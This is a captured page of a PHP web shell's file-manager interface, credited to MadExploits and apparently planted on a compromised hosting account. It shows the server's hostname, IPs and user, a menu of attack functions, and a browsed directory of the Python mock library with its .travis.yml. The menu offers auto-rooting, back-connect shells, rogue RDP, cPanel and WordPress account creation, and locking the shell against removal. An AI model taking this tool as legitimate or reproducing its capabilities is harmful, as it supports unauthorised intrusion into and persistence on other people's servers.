Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
mock /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
drwxr-xr-x
mock
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
.gitignore
172
B
-rw-r--r--
.testr.conf
145
B
-rw-r--r--
.travis.yml
522
B
-rw-r--r--
ChangeLog
95
B
-rw-r--r--
LICENSE.txt
1.31
KB
-rw-r--r--
NEWS
3.02
KB
-rw-r--r--
README.rst
1.2
KB
-rw-r--r--
extendmock.py
34
B
-rw-r--r--
mock.wpr
1.15
KB
-rw-r--r--
requirements.txt
217
B
-rw-r--r--
setup.cfg
1.53
KB
-rw-r--r--
setup.py
126
B
-rw-r--r--
tox.ini
736
B
-rw-r--r--
unittest.cfg
1.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
sudo: false language: python python: - "2.6" - "2.7" - "3.3" - "3.4" - pypy - pypy3 matrix: include: # Travis nightly look to be 3.5.0a4, b3 is out and the syntax error we see # doesn't happen in trunk. - python: "nightly" env: SKIP_DOCS=1 install: - pip install -U pip - pip install -U wheel setuptools - pip install -U .[docs,test] - pip list - python --version script: - unit2 - if [ -z "$SKIP_DOCS" ]; then python setup.py build_sphinx; fi - rst2html.py --strict README.rst README.html
Close